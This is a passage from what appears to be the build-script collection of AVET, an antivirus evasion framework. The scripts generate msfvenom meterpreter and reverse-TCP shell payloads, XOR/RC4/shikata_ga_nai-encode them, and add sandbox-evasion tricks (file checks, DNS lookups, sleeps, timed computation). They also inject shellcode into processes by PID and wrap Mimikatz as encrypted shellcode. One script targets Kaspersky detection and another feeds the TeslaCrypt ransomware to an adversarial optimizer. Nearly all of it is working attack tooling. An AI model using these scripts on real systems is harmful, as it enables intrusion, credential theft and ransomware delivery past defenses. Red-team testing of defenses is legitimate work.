./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 53 | 54 | # set shellcode source 55 | set_payload_source static_from_file input/scenc_c.txt 56 | 57 | # convert generated key from raw to C into array "key" 58 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 59 | 60 | # set key source 61 | set_key_source static_from_file input/key_c.txt 62 | 63 | # set payload info source 64 | set_payload_info_source from_command_line_raw 65 | 66 | # set decoder 67 | set_decoder xor 68 | 69 | # set shellcode binding technique 70 | set_payload_execution_method inject_shellcode 71 | 72 | # compile 73 | $win64_compiler -o output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe source/avet.c -lws2_32 74 | strip output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe 75 | 76 | # cleanup 77 | cleanup_techniques 78 | 79 | 80 | echo " 81 | # Usage example of generated injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe: 82 | # $ injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe first second 480 83 | 84 | # The first and second command line parameters can be arbitrary strings, as they are not used. We just need the third command line parameter. 85 | # Use the third parameter to specify the PID of the process you want to inject your payload into. 86 | " 87 | -------------------------------------------------------------------------------- /build/build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Shellcode injection 32-bit example build script 6 | # Creates an executable that injects the payload into a target process 7 | # The target is specified on execution via the third(!) command line argument, by PID 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win32_compiler 15 | # you can edit the compiler in build/global_win32.sh 16 | # or enter $win32_compiler="mycompiler" here 17 | . build/global_win32.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file 34 | generate_key preset aabbcc12de input/key_raw.txt 35 | # enable debug print 36 | enable_debug_print 37 | #CONFIGURATION_END 38 | 39 | 40 | # generate metasploit payload that will later be injected into the target process 41 | # use reverse_tcp because the 32-bit test system appears to not handle https well 42 | msfvenom -p windows/meterpreter/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 --platform Windows > input/sc_raw.txt 43 | 44 | # add evasion techniques 45 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 46 | add_evasion gethostbyname_sandbox_evasion 'this.that' 47 | reset_evasion_technique_counter 48 | 49 | # encode msfvenom shellcode 50 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 51 | 52 | # array name buf is expected by static_from_file retrieval method 53 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 54 | 55 | # set shellcode source 56 | set_payload_source static_from_file input/scenc_c.txt 57 | 58 | # convert generated key from raw to C into array "key" 59 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 60 | 61 | # set key source 62 | set_key_source static_from_file input/key_c.txt 63 | 64 | # set payload info source 65 | set_payload_info_source from_command_line_raw 66 | 67 | # set decoder 68 | set_decoder xor 69 | 70 | # set shellcode binding technique 71 | set_payload_execution_method inject_shellcode 72 | 73 | # compile 74 | $win32_compiler -o output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe source/avet.c -lws2_32 75 | strip output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe 76 | 77 | # cleanup 78 | cleanup_techniques 79 | 80 | echo " 81 | # Usage example of generated output.exe: 82 | # $ injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe first second 480 83 | 84 | # The first and second command line parameters can be arbitrary strings, as they are not used. We hust need the third command line parameter. 85 | # Use the third parameter to specify the PID of the process you want to inject your payload into. 86 | " 87 | -------------------------------------------------------------------------------- /build/build_kaspersky_fopen_shellrevtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # This is (was) for kaspersky, since meterpreter is recognized by in memory scanner. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make shell tcp reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/shell/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding 41 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 42 | 43 | # add fopen sandbox evasion technique 44 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 45 | 46 | # format into c array for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 48 | 49 | # set shellcode source 50 | set_payload_source static_from_file input/scenc_c.txt 51 | 52 | # set decoder and key source 53 | # AVET decoder requires no key 54 | set_decoder avet 55 | set_key_source no_data 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set shellcode binding technique 61 | set_payload_execution_method exec_shellcode 62 | 63 | # compile to exe file 64 | $win32_compiler -o output/kaspersky_fopen_shellrevtcp_win32.exe source/avet.c 65 | strip output/kaspersky_fopen_shellrevtcp_win32.exe 66 | 67 | # cleanup 68 | cleanup_techniques 69 | 70 | 71 | echo " 72 | # Execute the following command: 73 | # $ kaspersky_fopen_shellrevtcp_win32.exe 74 | " 75 | -------------------------------------------------------------------------------- /build/build_mimikatz_pe2shc_xorfromcmd_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Example script that uses an executable file as input, here Mimikatz. 6 | # Converts the exe to shellcode using the pe_to_shellcode tool by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | # 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | # Executes the executable as 64-bit shellcode. 12 | # Applied XOR encryption with a dynamic key, provided from the command line at run time. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win64_compiler 20 | # you can edit the compiler in build/global_win64.sh 21 | # or enter $win64_compiler="mycompiler" here 22 | . build/global_win64.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | . build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no preexec command 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # generate key file 39 | generate_key preset aabbccddee input/key_raw.txt 40 | # enable debug print 41 | enable_debug_print 42 | #CONFIGURATION_END 43 | 44 | 45 | # convert mimikatz executable into shellcode format 46 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/mimikatz.exe.shc 47 | 48 | # encode mimikatz shellcode 49 | encode_payload xor input/mimikatz.exe.shc input/mimikatz_enc_raw.txt input/key_raw.txt 50 | 51 | # convert raw shellcode into c format for static include 52 | ./tools/data_raw_to_c/data_raw_to_c input/mimikatz_enc_raw.txt input/mimikatz_enc_c.txt buf 53 | 54 | # set shellcode source 55 | set_payload_source static_from_file input/mimikatz_enc_c.txt 56 | 57 | # setting to retrieve the decryption key dynamically from command line in format "aabbccddee" 58 | set_key_source from_command_line_hex 59 | 60 | # set payload info source: not needed 61 | set_payload_info_source no_data 62 | 63 | # specify XOR decoding 64 | set_decoder xor 65 | 66 | # select 64-bit shellcode binding technique 67 | set_payload_execution_method exec_shellcode64 68 | 69 | # compile final payload 70 | $win64_compiler -o output/mimikatz_pe2shc_xorfromcmd_win64.exe source/avet.c 71 | strip output/mimikatz_pe2shc_xorfromcmd_win64.exe 72 | 73 | # cleanup 74 | cleanup_techniques 75 | 76 | 77 | echo " 78 | # The decryption key is aabbccddee if it has not been changed. 79 | # You need to provide the decryption key as 2nd command line argument. 80 | # Call generated executable on target like: 81 | # $ mimikatz_pe2shc_xorfromcmd_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 82 | " -------------------------------------------------------------------------------- /build/build_pause_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Calls system("pause") and waits for keypress before executing the payload. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## Invoke system pause 34 | add_evasion interaction_system_pause 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/pause_rc4_mimikatz.exe source/avet.c 68 | strip output/pause_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ pause_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_rc4_interactive_pwsh_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # RC4-encrypt the payload with a static, preset key. 5 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 6 | # pe_to_shellcode is written by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | #DESCRIPTION_END 12 | 13 | # print AVET logo 14 | cat banner.txt 15 | 16 | # include script containing the compiler var $win64_compiler 17 | # you can edit the compiler in build/global_win64.sh 18 | # or enter $win64_compiler="mycompiler" here 19 | . build/global_win64.sh 20 | 21 | # import feature construction interface 22 | . build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | # powershell open MessageBox with an ok button 33 | set_command_source static_from_here "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Click OK to Proceed!' , 'Interactive')" 34 | set_command_exec exec_via_powershell 35 | 36 | # convert mimikatz executable into shellcode format 37 | # Can be of course used with other .exe files 38 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 39 | # encrypt payload 40 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 41 | 42 | # convert encoded, raw payload into c format for static include 43 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 44 | 45 | # set payload source 46 | set_payload_source static_from_file input/sc_enc_c.txt 47 | 48 | # set decoder 49 | set_decoder rc4 50 | 51 | # convert key to c format and include statically 52 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 53 | set_key_source static_from_file input/key_c.txt 54 | 55 | # set payload info source 56 | set_payload_info_source no_data 57 | 58 | # set shellcode binding technique 59 | set_payload_execution_method exec_shellcode64 60 | 61 | 62 | # compile to exe file 63 | $win64_compiler -o output/rc4_interactive_pwsh_mimikatz_win64.exe source/avet.c 64 | strip output/rc4_interactive_pwsh_mimikatz_win64.exe 65 | 66 | # cleanup 67 | cleanup_techniques 68 | 69 | 70 | echo " 71 | # The decryption key is aabbccddee if it has not been changed. 72 | # You need to provide the decryption key as 2nd command line argument. 73 | # Call generated executable on target like: 74 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 75 | " 76 | -------------------------------------------------------------------------------- /build/build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # RC4-encrypt the payload with a static, preset key. 5 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 6 | # pe_to_shellcode is written by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | #DESCRIPTION_END 12 | 13 | # print AVET logo 14 | cat banner.txt 15 | 16 | # include script containing the compiler var $win64_compiler 17 | # you can edit the compiler in build/global_win64.sh 18 | # or enter $win64_compiler="mycompiler" here 19 | . build/global_win64.sh 20 | 21 | # import feature construction interface 22 | . build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | 33 | set_command_source no_data 34 | set_command_exec no_command 35 | 36 | # powershell open MessageBox with text field and ok button 37 | add_evasion interaction_msg_box 38 | 39 | # convert mimikatz executable into shellcode format 40 | # Can be of course used with other .exe files 41 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 42 | # encrypt payload 43 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 44 | 45 | # convert encoded, raw payload into c format for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 47 | 48 | # set payload source 49 | set_payload_source static_from_file input/sc_enc_c.txt 50 | 51 | # set decoder 52 | set_decoder rc4 53 | 54 | # convert key to c format and include statically 55 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 56 | set_key_source static_from_file input/key_c.txt 57 | 58 | # set payload info source 59 | set_payload_info_source no_data 60 | 61 | # set shellcode binding technique 62 | set_payload_execution_method exec_shellcode64 63 | 64 | 65 | # compile to exe file 66 | $win64_compiler -o output/rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.exe source/avet.c 67 | strip output/rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | 73 | echo " 74 | # The decryption key is aabbccddee if it has not been changed. 75 | # You need to provide the decryption key as 2nd command line argument. 76 | # Call generated executable on target like: 77 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 78 | " 79 | -------------------------------------------------------------------------------- /build/build_rc4enc_mimikatz_adversarial_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win64_compiler 19 | # you can edit the compiler in build/global_win64.sh 20 | # or enter $win64_compiler="mycompiler" here 21 | . build/global_win64.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file with preset key 34 | generate_key preset aabbccdd1122 input/key_raw.txt 35 | #CONFIGURATION_END 36 | 37 | 38 | # convert mimikatz executable into shellcode format 39 | # Can be of course used with other .exe files 40 | wine ./../pe_to_shellcode/pe2shc.exe input/teslacrypt.exe input/sc_raw.txt 41 | # encrypt payload 42 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 43 | 44 | # convert encoded, raw payload into c format for static include 45 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 46 | 47 | # set payload source 48 | set_payload_source static_from_file input/sc_enc_c.txt 49 | 50 | # set decoder 51 | set_decoder rc4 52 | 53 | # convert key to c format and include statically 54 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 55 | set_key_source static_from_file input/key_c.txt 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set shellcode binding technique 61 | set_payload_execution_method exec_shellcode64 62 | 63 | 64 | # compile to exe file 65 | $win64_compiler -o output/rc4enc_mimikatz_adversarial_win64.exe source/avet.c 66 | strip output/rc4enc_mimikatz_adversarial_win64.exe 67 | 68 | # generate adversarial example 69 | practical_manipulation="section_injection" 70 | population_size=100 71 | 72 | $genetic_optimizer -pm $practical_manipulation -p $population_size output/rc4enc_mimikatz_adversarial_win64.exe 73 | 74 | # Or use practical manipulation without optimizer 75 | # gen_adversarial_exe section_injection output/rc4enc_mimikatz_adversarial_win64.exe 76 | 77 | # cleanup 78 | cleanup_techniques 79 | 80 | 81 | echo " 82 | # The decryption key is aabbccddee if it has not been changed. 83 | # You need to provide the decryption key as 2nd command line argument. 84 | # Call generated executable on target like: 85 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 86 | " 87 | -------------------------------------------------------------------------------- /build/build_rc4enc_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win64_compiler 19 | # you can edit the compiler in build/global_win64.sh 20 | # or enter $win64_compiler="mycompiler" here 21 | . build/global_win64.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file with preset key 34 | generate_key preset aabbccdd1122 input/key_raw.txt 35 | #CONFIGURATION_END 36 | 37 | 38 | # convert mimikatz executable into shellcode format 39 | # Can be of course used with other .exe files 40 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 41 | # encrypt payload 42 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 43 | 44 | # convert encoded, raw payload into c format for static include 45 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 46 | 47 | # set payload source 48 | set_payload_source static_from_file input/sc_enc_c.txt 49 | 50 | # set decoder 51 | set_decoder rc4 52 | 53 | # convert key to c format and include statically 54 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 55 | set_key_source static_from_file input/key_c.txt 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set shellcode binding technique 61 | set_payload_execution_method exec_shellcode64 62 | 63 | 64 | # compile to exe file 65 | $win64_compiler -o output/rc4enc_mimikatz_win64.exe source/avet.c 66 | strip output/rc4enc_mimikatz_win64.exe 67 | 68 | # cleanup 69 | cleanup_techniques 70 | 71 | 72 | echo " 73 | # The decryption key is aabbccddee if it has not been changed. 74 | # You need to provide the decryption key as 2nd command line argument. 75 | # Call generated executable on target like: 76 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 77 | " 78 | -------------------------------------------------------------------------------- /build/build_sleep_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # RC4-encrypt the payload with a static, preset key. 5 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 6 | # pe_to_shellcode is written by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | #DESCRIPTION_END 12 | 13 | # print AVET logo 14 | cat banner.txt 15 | 16 | # include script containing the compiler var $win64_compiler 17 | # you can edit the compiler in build/global_win64.sh 18 | # or enter $win64_compiler="mycompiler" here 19 | . build/global_win64.sh 20 | 21 | # import feature construction interface 22 | . build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | ## add sleep evasion 33 | add_evasion evasion_by_sleep 300000 34 | 35 | # powershell open MessageBox with an ok button 36 | set_command_source no_data 37 | set_command_exec no_command 38 | 39 | # convert mimikatz executable into shellcode format 40 | # Can be of course used with other .exe files 41 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 42 | # encrypt payload 43 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 44 | 45 | # convert encoded, raw payload into c format for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 47 | 48 | # set payload source 49 | set_payload_source static_from_file input/sc_enc_c.txt 50 | 51 | # set decoder 52 | set_decoder rc4 53 | 54 | # convert key to c format and include statically 55 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 56 | set_key_source static_from_file input/key_c.txt 57 | 58 | # set payload info source 59 | set_payload_info_source no_data 60 | 61 | # set shellcode binding technique 62 | set_payload_execution_method exec_shellcode64 63 | 64 | 65 | # compile to exe file 66 | $win64_compiler -o output/sleep_rc4_mimikatz.exe source/avet.c 67 | strip output/sleep_rc4_mimikatz.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | 73 | echo " 74 | # The decryption key is aabbccddee if it has not been changed. 75 | # You need to provide the decryption key as 2nd command line argument. 76 | # Call generated executable on target like: 77 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 78 | " 79 | -------------------------------------------------------------------------------- /build/build_sleepbyping_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Sleeps for 5 minutes, issuing a timed ping command, attempting to timeout sandboxes. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | # sleep for 300 seconds by waiting for ping to finish 34 | add_evasion sleep_by_ping 300 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/sleepbyping_rc4_mimikatz.exe source/avet.c 68 | strip output/sleepbyping_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ sleepbyping_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_timedfibonacci_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Performs dummy computations for five minutes before executing the payload, attempting to timeout sandboxes. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## terminate program if target is not in specified domain 34 | add_evasion computation_timed_fibonacci 300 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | 